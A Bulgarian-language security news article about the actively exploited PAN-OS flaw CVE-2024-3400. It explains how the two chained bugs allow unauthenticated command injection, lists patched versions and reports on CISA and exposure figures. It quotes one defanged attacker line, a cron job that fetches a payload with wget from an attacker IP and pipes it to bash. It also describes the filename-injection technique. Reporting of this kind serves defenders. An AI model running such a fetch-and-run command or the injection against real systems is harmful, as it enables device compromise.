Търсене
Close this search box.

Palo Alto Networks сподели повече подробности за критичен недостатък в сигурността на PAN-OS, който се експлоатира активно от злонамерени хакери.

Компанията описва уязвимостта, проследена като CVE-2024-3400 (CVSS score: 10.0), като „сложна“ и представляваща комбинация от две грешки във версиите PAN-OS 10.2, PAN-OS 11.0 и PAN-OS 11.1 на софтуера.

„При първата от тях услугата GlobalProtect не е валидирала в достатъчна степен формата на идентификаторите на сесиите, преди да ги съхрани. Това позволи на нападателя да съхрани празен файл с избрано от него име“, казва Чандан Б. Н., старши директор по продуктова сигурност в Palo Alto Networks.

„Вторият бъг (доверяващ се на това, че файловете са генерирани от системата) използваше имената на файловете като част от команда.“

Струва си да се отбележи, че макар нито един от проблемите да не е достатъчно критичен сам по себе си, когато са верижно свързани, те могат да доведат до неавтентифицирано изпълнение на отдалечена шел команда.

От Palo Alto Networks заявиха, че извършителят, който стои зад експлоатирането на дефекта от нулев ден, UTA0218, е извършил двуетапна атака, за да постигне изпълнение на команди на податливи устройства. Дейността се проследява под името Операция MidnightEclipse.

Както вече беше разкрито както от Volexity, така и от собственото подразделение за разузнаване на заплахи Unit 42 на компанията за мрежова сигурност, това включва изпращане на специално подготвени заявки, съдържащи командата, която трябва да бъде изпълнена, и която след това се изпълнява чрез задна врата, наречена UPSTYLE.

„Първоначалният механизъм за устойчивост, създаден от UTA0218, включваше конфигуриране на cron job, който използваше wget за извличане на полезен товар от контролиран от атакуващия URL адрес, като изходът му се записваше в stdout и се изпращаше в bash за изпълнение“, отбеляза Volexity миналата седмица.

PAN-OS Flaw Under Attack

„Нападателят е използвал този метод, за да разположи и изпълни конкретни команди и да изтегли инструменти за обратен прокси сървър, като например GOST (GO Simple Tunnel).“

Unit 42  заяви, че не е успяло да определи командите, изпълнени чрез този механизъм – wget -qO- hxxp://172.233.228[.]93/policy | bash – но прецени, че имплантът, базиран на задачи cron, вероятно е използван за извършване на дейности след експлоатирането.

„На етап 1 нападателят изпраща на GlobalProtect внимателно подготвена команда на шел вместо валиден идентификатор на сесия“, обясни Чандан. „Това води до създаване на празен файл в системата с вградена команда като име на файла, избрано от нападателя.“

„На етап 2 нищо неподозиращо планирано системно задание, което се изпълнява редовно, използва предоставеното от атакуващия име на файла в команда. Това води до изпълнение на предоставената от атакуващия команда с повишени привилегии.“

Макар че Palo Alto Networks първоначално отбеляза, че успешното използване на CVE-2024-3400 изисква да бъдат активирани конфигурациите на защитната стена за GlobalProtect gateway или GlobalProtect portal (или и двете) и телеметрията на устройствата, впоследствие компанията потвърди, че телеметрията на устройствата няма отношение към проблема.

 

Това се основава на новите открития на Bishop Fox, които откриха заобиколни пътища за използване на дефекта, така че да не се изисква включването на телеметрия в устройството, за да се проникне в него.

През последните няколко дни компанията също така разшири кръпките за дефекта извън основните версии, за да обхване и други често използвани версии за поддръжка –

  • PAN-OS 10.2.9-h1
  • PAN-OS 10.2.8-h3
  • PAN-OS 10.2.7-h8
  • PAN-OS 10.2.6-h3
  • PAN-OS 10.2.5-h6
  • PAN-OS 10.2.4-h16
  • PAN-OS 10.2.3-h13
  • PAN-OS 10.2.2-h5
  • PAN-OS 10.2.1-h2
  • PAN-OS 10.2.0-h3
  • PAN-OS 11.0.4-h1
  • PAN-OS 11.0.4-h2
  • PAN-OS 11.0.3-h10
  • PAN-OS 11.0.2-h4
  • PAN-OS 11.0.1-h4
  • PAN-OS 11.0.0-h3
  • PAN-OS 11.1.2-h3
  • PAN-OS 11.1.1-h1
  • PAN-OS 11.1.0-h3

С оглед на активната злоупотреба с CVE-2024-3400 и наличието на код за експлойт с доказана концепция (PoC), на потребителите се препоръчва да предприемат стъпки за прилагане на горещите поправки възможно най-скоро, за да се предпазят от потенциални заплахи.

Американската агенция за киберсигурност и инфраструктурна сигурност (CISA) също добави недостатъка в своя каталог на известните експлоатирани уязвимости (KEV), като нареди на федералните агенции да защитят своите устройства до 19 април 2024 г.

Според информация, споделена от Shadowserver Foundation, приблизително 22 542 устройства за защитна стена, изложени на риск в интернет, вероятно са уязвими към CVE-2024-3400. По-голямата част от устройствата се намират в САЩ, Япония, Индия, Германия, Великобритания, Канада, Австралия, Франция и Китай към 18 април 2024 г.

Palo Alto Networks

Източник: The Hacker News

Подобни публикации

4 октомври 2024

Русия арестува 96 души, свързани с прекъснати о...

Тази седмица руските власти обявиха, че са арестували 96 души по по...
4 октомври 2024

Използвана уязвимост на Ivanti EPM

Тази седмица Ivanti и американската агенция за киберсигурност CISA ...
4 октомври 2024

Холандското правителство обвинява АРТ за хакван...

Министърът на правосъдието заяви пред депутатите, че кибератаката, ...
3 октомври 2024

Криптопортфейли, насочени чрез пакети за Python...

Потребителите на популярни портфейли за криптовалута са били обект ...
3 октомври 2024

САЩ и техните съюзници издават ръководство за з...

Нови насоки от правителствени агенции в САЩ и съюзнически държави п...
3 октомври 2024

MITRE добавя смекчаващи мерки към модела на зап...

Във вторник (в България сряда )MITRE обяви пълната версия на модела...
Бъдете социални
Още по темата
27/09/2024

Предпазване от кибератаки п...

През последните години киберпрестъпниците все по-често...
24/09/2024

Versa Networks закърпва уяз...

Versa Networks обяви кръпки за уязвимост...
18/09/2024

D-Link обяви кръпки за множ...

Тайванският производител на мрежов хардуер D-Link...
Последно добавени
04/10/2024

Русия арестува 96 души, свъ...

Тази седмица руските власти обявиха, че...
04/10/2024

Използвана уязвимост на Iva...

Тази седмица Ivanti и американската агенция...
04/10/2024

Холандското правителство об...

Министърът на правосъдието заяви пред депутатите,...
Ключови думи

Абонамента е почти завършен.

На посоченият от Вас e-mail е изпратено съобщение за потвърждаване на абонамента.

Моля, проверете електронната си поща за да потвърдите.

Благодарим за доверието!